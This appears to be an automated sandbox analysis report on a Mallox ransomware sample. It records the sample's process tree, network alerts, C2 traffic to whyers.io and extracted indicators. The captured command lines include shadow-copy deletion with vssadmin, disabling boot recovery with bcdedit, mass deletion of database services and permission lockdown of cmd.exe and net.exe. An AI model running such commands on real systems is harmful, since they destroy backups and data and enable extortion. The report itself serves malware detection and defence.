Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | July 27, 2023, 11:43 a.m. | July 27, 2023, 11:45 a.m. |
-
-
-
reg.exe reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f
2744 -
takeown.exe takeown /f C:\Windows\system32\cmd.exe /a
2804 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3000 -
cacls.exe cacls C:\Windows\system32\cmd.exe /g Administrators:f
1488 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
524 -
cacls.exe cacls C:\Windows\system32\cmd.exe /e /g Users:r
2272 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2120 -
cacls.exe cacls C:\Windows\system32\cmd.exe /e /g Administrators:r
2180 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2980 -
cacls.exe cacls C:\Windows\system32\cmd.exe /e /d SERVICE
2844 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2084 -
cacls.exe cacls C:\Windows\system32\cmd.exe /e /d mssqlserver
2336 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2580 -
cacls.exe cacls C:\Windows\system32\cmd.exe /e /d "network service"
792 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2148 -
cacls.exe cacls C:\Windows\system32\cmd.exe /e /g system:r
2128 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3060 -
cacls.exe cacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress
3048 -
takeown.exe takeown /f C:\Windows\SysWOW64\cmd.exe /a
2532 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2636 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f
2652 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2172 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r
2808 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2348 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r
2780 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
1340 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE
2240 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2632 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver
2700 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
1808 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /d "network service"
2560 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2588 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /g system:r
316 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3084 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress
3120 -
takeown.exe takeown /f C:\Windows\system32\net.exe /a
3176 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3228 -
cacls.exe cacls C:\Windows\system32\net.exe /g Administrators:f
3264 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3320 -
cacls.exe cacls C:\Windows\system32\net.exe /e /g Users:r
3356 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3412 -
cacls.exe cacls C:\Windows\system32\net.exe /e /g Administrators:r
3448 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3504 -
cacls.exe cacls C:\Windows\system32\net.exe /e /d SERVICE
3540 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3596 -
cacls.exe cacls C:\Windows\system32\net.exe /e /d mssqlserver
3632 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3688 -
cacls.exe cacls C:\Windows\system32\net.exe /e /d "network service"
3724 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3784 -
cacls.exe cacls C:\Windows\system32\net.exe /e /d system
3820 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3876 -
cacls.exe cacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress
3912 -
takeown.exe takeown /f C:\Windows\SysWOW64\net.exe /a
3968 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4012 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /g Administrators:f
4048 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2584 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /g Users:r
3140 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3224 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r
3280 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3376 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /d SERVICE
3360 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3452 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver
3564 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3648 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /d "network service"
3636 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
1476 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /d system
3776 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3868 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress
3936 -
takeown.exe takeown /f C:\Windows\system32\net1.exe /a
4008 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4092 -
cacls.exe cacls C:\Windows\system32\net1.exe /g Administrators:f
3088 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3260 -
cacls.exe cacls C:\Windows\system32\net1.exe /e /g Users:r
3348 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3492 -
cacls.exe cacls C:\Windows\system32\net1.exe /e /g Administrators:r
3592 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3744 -
cacls.exe cacls C:\Windows\system32\net1.exe /e /d SERVICE
2260 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3796 -
cacls.exe cacls C:\Windows\system32\net1.exe /e /d mssqlserver
3960 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4016 -
cacls.exe cacls C:\Windows\system32\net1.exe /e /d "network service"
3192 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3404 -
cacls.exe cacls C:\Windows\system32\net1.exe /e /d system
3532 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3680 -
cacls.exe cacls C:\Windows\system32\net1.exe /e /d mssql$sqlexpress
3844 -
takeown.exe takeown /f C:\Windows\SysWOW64\net1.exe /a
4000 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3112 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /g Administrators:f
3352 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
1780 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /g Users:r
3780 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3248 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /g Administrators:r
3516 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3100 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /d SERVICE
3772 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3240 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /d mssqlserver
3864 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4136 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /d "network service"
4172 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4232 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /d system
4268
-
-
-
vssadmin.exe "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet
2920 -
cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
2940 -
cmd.exe "C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe
2948 -
sc.exe sc delete "MSSQLFDLauncher"
1028
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
948
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
whyers.io | 172.67.191.103 | |
api.ipify.org | CNAME api4.ipify.org, 104.237.62.211 | |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49161 -> 80.66.75.37:80 | 2027265 | ET INFO Dotted Quad Host PDF Request | Potentially Bad Traffic |
UDP 192.168.56.103:50800 -> 8.8.8.8:53 | 2046826 | ET MALWARE Mallox Ransomware CnC Domain (whyers .io) in DNS Lookup | A Network Trojan was detected |
TCP 192.168.56.103:49197 -> 104.237.62.211:80 | 2021997 | ET POLICY External IP Lookup api.ipify.org | Device Retrieving External IP Address Detected |
TCP 192.168.56.103:49201 -> 104.21.76.77:443 | 2046827 | ET MALWARE Observed Mallox Ransomware Domain (whyers .io) in TLS SNI | A Network Trojan was detected |
TCP 192.168.56.103:49201 -> 104.21.76.77:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49201 104.21.76.77:443 | C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=whyers.io | b5:70:31:dc:b0:cd:7d:e9:af:71:21:ec:4b:e6:97:ce:e4:da:a6:57 |
file | C:\Program Files\Mozilla Firefox\browser\VisualElements\FILE RECOVERY.txt |
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://80.66.75.37/Gqfnqspsx.pdf | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://api.ipify.org/ | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header | suspicious_request | POST https://whyers.io/QWEwqdsvsf/ap.php |
request | GET http://80.66.75.37/Gqfnqspsx.pdf |
request | GET http://api.ipify.org/ |
request | POST https://whyers.io/QWEwqdsvsf/ap.php |
request | POST https://whyers.io/QWEwqdsvsf/ap.php |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\QuotaManager-journal |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOCK |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_1 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_0 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Crashpad\metadata |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\290dcccb-9986-4f16-98a9-c54df8312e93 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\000003.log |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\000003.log |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\databases |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\290dcccb-9986-4f16-98a9-c54df8312e93\index-dir |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\000003.log |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\LOG.old |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Origin Bound Certs |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Thumbnails\000003.log |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\LOG.old |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_2 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Thumbnails\LOG.old |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Preferences |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Crashpad\reports\8dc74f67-39b6-4058-9ac1-6f782fcd0d62.dmp |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOCK |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOCK |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\previews_opt_out.db |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Last Session |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Cache\index |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\index.txt |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Cache |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Favicons |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\History |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\290dcccb-9986-4f16-98a9-c54df8312e93\52eca80efb7ea8c5_0 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_3 |
domain | api.ipify.org |
file | C:\Users\test22\AppData\Local\Temp\Kill-Delete.bat |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Narrator.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Explorer.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Ease of Access.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\computer.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Command Prompt.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Run.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\On-Screen Keyboard.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Magnify.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Control Panel.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Help.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Private Character Editor.lnk |
cmdline | cacls C:\Windows\system32\cmd.exe /e /g Users:r |
cmdline | cacls C:\Windows\system32\cmd.exe /g Administrators:f |
cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /d "network service" |
cmdline | takeown /f C:\Windows\system32\cmd.exe /a |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo Y" |
cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE |
cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /g system:r |
cmdline | cacls C:\Windows\system32\cmd.exe /e /g Administrators:r |
cmdline | cmd.exe /c bcdedit /set {current} recoveryenabled no |
cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r |
cmdline | cacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f |
cmdline | cacls C:\Windows\system32\cmd.exe /e /g system:r |
cmdline | cmd.exe /c bcdedit /set {current} bootstatuspolicy ignoreallfailures |
cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r |
cmdline | cacls C:\Windows\system32\cmd.exe /e /d SERVICE |
cmdline | takeown /f C:\Windows\SysWOW64\cmd.exe /a |
cmdline | cmd.exe /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe |
cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress |
cmdline | cacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress |
cmdline | "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures |
cmdline | "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no |
cmdline | cacls C:\Windows\system32\cmd.exe /e /d mssqlserver |
cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver |
cmdline | cacls C:\Windows\system32\cmd.exe /e /d "network service" |
cmdline | "C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo y" |
url | https://www.torproject.org/download/ |
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Escalate privileges | rule | Escalate_priviledges | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
cmdline | cacls C:\Windows\SysWOW64\net.exe /e /d SERVICE |
cmdline | takeown /f C:\Windows\SysWOW64\net.exe /a |
cmdline | cacls C:\Windows\system32\net.exe /e /d system |
cmdline | cacls C:\Windows\system32\net.exe /e /d mssqlserver |
cmdline | cacls C:\Windows\system32\net.exe /e /d "network service" |
cmdline | cacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver |
cmdline | sc delete "MSSQLFDLauncher" |
cmdline | cacls C:\Windows\system32\net.exe /e /g Users:r |
cmdline | cacls C:\Windows\SysWOW64\net.exe /g Administrators:f |
cmdline | takeown /f C:\Windows\system32\net.exe /a |
cmdline | cacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r |
cmdline | cacls C:\Windows\system32\net.exe /g Administrators:f |
cmdline | cacls C:\Windows\SysWOW64\net.exe /e /d "network service" |
cmdline | cacls C:\Windows\SysWOW64\net.exe /e /g Users:r |
cmdline | cacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress |
cmdline | cmd.exe /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe |
cmdline | cacls C:\Windows\system32\net.exe /e /d SERVICE |
cmdline | reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f |
cmdline | cacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress |
